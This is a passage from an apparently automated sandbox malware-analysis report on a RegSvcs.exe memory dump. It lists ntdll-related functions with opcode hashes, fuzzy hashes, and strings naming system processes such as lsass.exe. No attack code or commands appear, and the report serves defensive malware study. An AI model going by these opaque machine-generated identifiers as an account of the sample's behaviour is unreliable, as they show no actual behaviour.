                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 0a07410457777479b153f4e9509096cde1a7a27d190cc14e66a068c3845e8590
                                                                                            • Instruction ID: c4dd6d147a74027631c04f1c2eb3054435f769b42516bad7f3f096fbc8315653
                                                                                            • Opcode Fuzzy Hash: 0a07410457777479b153f4e9509096cde1a7a27d190cc14e66a068c3845e8590
                                                                                            • Instruction Fuzzy Hash: 8690022160140612D20171598505B16000A87D0381F95C037A1024555FCE2A8A93B131
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ca06db403f52a6f03c04a9fcb5a1ca5b81d43a4192a9d83a8372865f35962f3a
                                                                                            • Instruction ID: 9447fc49d7ecfe7201fb0216b0f84dc5c70336e5462898eb1aed643878306537
                                                                                            • Opcode Fuzzy Hash: ca06db403f52a6f03c04a9fcb5a1ca5b81d43a4192a9d83a8372865f35962f3a
                                                                                            • Instruction Fuzzy Hash: 13900221211C0152D30075698D15F07000587D0343F55C12AA0154554DCD1A89626521
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 17 fb2fb0-fb2fbc LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: b58e7f0f23298888630ee61c6a515786677760862335ed59d6e7a1e43596dfe2
                                                                                            • Instruction ID: 32a40eccda2dea1565d2729ad8c5e4dd1bfa7f52c1841af85c109b27bf5a958f
                                                                                            • Opcode Fuzzy Hash: b58e7f0f23298888630ee61c6a515786677760862335ed59d6e7a1e43596dfe2
                                                                                            • Instruction Fuzzy Hash: F39002216014015242407169C945E064005ABE1351755C136A0998550E895E89666665
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 16 fb2f90-fb2f9c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: d5a7e83e8dcedc0a8b82cbd8dde6e356f6a47672cd524ccfe2448ebcdec3f9d2
                                                                                            • Instruction ID: dd002c79d4735544dec29bd3f31651e2c12004ed7fcd99c37914abb055e96413
                                                                                            • Opcode Fuzzy Hash: d5a7e83e8dcedc0a8b82cbd8dde6e356f6a47672cd524ccfe2448ebcdec3f9d2
                                                                                            • Instruction Fuzzy Hash: 1290023120180512D20071598915B0B000587D0342F55C026A1164555E8A2A89527571
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 15 fb2f30-fb2f3c LdrInitializeThunk
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 1ffce6adc88922f68b6a4987a6c6c1c26f3bd26ef401914b23c18133a94ae830
                                                                                            • Instruction ID: 65fa3055435cff3d52910b4497877c2f6e4c3b551711555708ffa396a622bbca
                                                                                            • Opcode Fuzzy Hash: 1ffce6adc88922f68b6a4987a6c6c1c26f3bd26ef401914b23c18133a94ae830
                                                                                            • Instruction Fuzzy Hash: E990026134140552D20071598515F060005C7E1341F55C02AE1064554E8A1ECD537126
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 fb2c0a-fb2c0f 1 fb2c1f-fb2c26 LdrInitializeThunk 0->1 2 fb2c11-fb2c18 0->2
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e57106ef2f184f3785d77388ccedf33099499218afcf82acf602713834556214
                                                                                            • Instruction ID: 4197e17a98aac88052eed55bc4bf83f98d9f911cf9d010573d113f9e9389cfa8
                                                                                            • Opcode Fuzzy Hash: e57106ef2f184f3785d77388ccedf33099499218afcf82acf602713834556214
                                                                                            • Instruction Fuzzy Hash: 0BB09B71D015C5D5DB51E7614709B1B7E0067D0751F15C076D2030641F473DC5D1F575
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041F0F0 Relevance: .0, Instructions: 7COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1772637211.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_41f000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6b9f8b07fea5db4bbec7f5d26f0e2d27b443d0e5888b6a4560a2a3835bf231a7
                                                                                            • Instruction ID: bf268d91f619938eb03b39c7895fca664e884f2412e91478f794490b2a2455dc
                                                                                            • Opcode Fuzzy Hash: 6b9f8b07fea5db4bbec7f5d26f0e2d27b443d0e5888b6a4560a2a3835bf231a7
                                                                                            • Instruction Fuzzy Hash: 71A022A8C0830C03002030FA2A03023B38CC000008F0003EAAE8C022023C02AC3200EB
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 01018B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                            • API String ID: 0-2515994595
                                                                                            • Opcode ID: e2dec7c154d33ce43950d6485f76ed2299b02eed4bf689700b1f3c86e29ca4b8
                                                                                            • Instruction ID: 5d926383a66821f7e0ca0be58bbabc68d1ae04c9fec2147390201a9738e23b6b
                                                                                            • Opcode Fuzzy Hash: e2dec7c154d33ce43950d6485f76ed2299b02eed4bf689700b1f3c86e29ca4b8
                                                                                            • Instruction Fuzzy Hash: 1B51D2B11083059BD325EF188848BABBBE8FF84340F54891EF998C3249E778D604DBD2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • LdrpCheckRedirection, xrefs: 00FF488F
                                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FF4888
                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 00FF4899
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 3446177414-3154609507
                                                                                            • Opcode ID: bbd81c3216fe1044e919ba58e8902f73dc27d5c2de01d82c60d3d1d42e43e449
                                                                                            • Instruction ID: e78b934b9b25f95f0c9d77db55ce5783d846bbb5e4d062218d2352aec2ae016a
                                                                                            • Opcode Fuzzy Hash: bbd81c3216fe1044e919ba58e8902f73dc27d5c2de01d82c60d3d1d42e43e449
                                                                                            • Instruction Fuzzy Hash: 26418E33A046589BCB21DE589840A377BE4BF49BA0F050669EE9897375E725FC00EB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00FB2DF0: LdrInitializeThunk.NTDLL ref: 00FB2DFA
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0BA3
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0BB6
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0D60
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FB0D74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 1404860816-0
                                                                                            • Opcode ID: aa8e52f0e988b70ac905938740b47ab964df05582e0cd27657de6f4a1e288b37
                                                                                            • Instruction ID: 7fbda786996ad59fcdeec1c60e71d05c3ea2ef573041ed52af0fb56306318252
                                                                                            • Opcode Fuzzy Hash: aa8e52f0e988b70ac905938740b47ab964df05582e0cd27657de6f4a1e288b37
                                                                                            • Instruction Fuzzy Hash: A9425A729007159FDB60CF25C881BEAB7F5BF44310F1445A9E989EB242EB74EA84DF60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0104B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID:
                                                                                            • API String ID: 3446177414-0
                                                                                            • Opcode ID: 5b5db074237ad4e288609328aaca4e5479398fa2da05f29b86628c3754c5de4a
                                                                                            • Instruction ID: e962b87347ac822dc2a433059c75ebb068587b65199511a0abfc30b28418ac5c
                                                                                            • Opcode Fuzzy Hash: 5b5db074237ad4e288609328aaca4e5479398fa2da05f29b86628c3754c5de4a
                                                                                            • Instruction Fuzzy Hash: 48F1F5B2E006118BDB58DF6DC9D167EFBF5AF8821071941BDD896DB381E634EA01CB90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F7EA80 Relevance: 6.1, Strings: 4, Instructions: 1073COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $R$T${
                                                                                            • API String ID: 0-4276472446
                                                                                            • Opcode ID: 1dd1dc67577360e7733d2347bab525281d4cfaa5fc4279677f922bc497e1a68b
                                                                                            • Instruction ID: ac84745b02a0cbf50cf7d1d70976398c0b22141d0a75525f1f84ba0b19c543c5
                                                                                            • Opcode Fuzzy Hash: 1dd1dc67577360e7733d2347bab525281d4cfaa5fc4279677f922bc497e1a68b
                                                                                            • Instruction Fuzzy Hash: 15A22C75E056298FDB64DF14CC887A9B7B5AF49314F2482EAD80DA7350DB30AE85EF01
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F96962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID: $@
                                                                                            • API String ID: 2994545307-1077428164
                                                                                            • Opcode ID: 63596a5898475c00b3be180a0fe3d72ca345c14ab9c6aefffee34f8f4f7d11d0
                                                                                            • Instruction ID: 02f44fcdecdcabc629b84428960d21cc7a738b4f3c19c29e0cfa4740d70bf546
                                                                                            • Opcode Fuzzy Hash: 63596a5898475c00b3be180a0fe3d72ca345c14ab9c6aefffee34f8f4f7d11d0
                                                                                            • Instruction Fuzzy Hash: 9AC29172A1C3419FEB25DF24C841BABB7E5AF88714F14892EF989C7241D734D805EB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F704E5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: DebugPrintTimes
                                                                                            • String ID: kLsE
                                                                                            • API String ID: 3446177414-3058123920
                                                                                            • Opcode ID: 0786919e7305f9103d008a2ea28b71f0d16170568ec65c89e5f164dcfdcc1257
                                                                                            • Instruction ID: cab6196730b601a969f0349bc8aaf6e459d393dc9e37c4a92747057cae2330cc
                                                                                            • Opcode Fuzzy Hash: 0786919e7305f9103d008a2ea28b71f0d16170568ec65c89e5f164dcfdcc1257
                                                                                            • Instruction Fuzzy Hash: 9951AB71904746DBC724EF28C9406A7B7E4AF84314F04883EE9AE87281EB74E945DF92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF2349 Relevance: 3.6, Strings: 2, Instructions: 1117COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@
                                                                                            • API String ID: 0-149943524
                                                                                            • Opcode ID: 3f2156b39b72b4c7d4bfa00a4bd3ea0aa912b3dfeef70c205a713f451ee1c42f
                                                                                            • Instruction ID: a68ccb417c3ebc16656292551e6384a4601503a3a40e45065922be92af674680
                                                                                            • Opcode Fuzzy Hash: 3f2156b39b72b4c7d4bfa00a4bd3ea0aa912b3dfeef70c205a713f451ee1c42f
                                                                                            • Instruction Fuzzy Hash: 0F92CC71A04345AFE760DF24C881B6BB7E8BF84760F04482DFA84D72A1D774E944EB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0103A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `$`
                                                                                            • API String ID: 0-197956300
                                                                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction ID: ce46e4b37d87d8e013d08e69cdbf34dd620f862cbb7ce067a480a284ac79e695
                                                                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                            • Instruction Fuzzy Hash: 34C19C313043469BEB25CE28C841B6BBBE9AFC8318F084A6DF6D6CB291D775D505CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F7A3C0 Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$8
                                                                                            • API String ID: 0-105715976
                                                                                            • Opcode ID: 6df4352d34cff2e79a48a2816dfff08329f2a40f1fd125c6a556fd9b1827059d
                                                                                            • Instruction ID: db54a79d3d0422bc867584164f773588708252765327a1cf989bfc6a52445559
                                                                                            • Opcode Fuzzy Hash: 6df4352d34cff2e79a48a2816dfff08329f2a40f1fd125c6a556fd9b1827059d
                                                                                            • Instruction Fuzzy Hash: FBC189715083828FC711CF18C544B6EB7E4BF84714F09896AF8998B261E779CA49EB93
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0101A118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
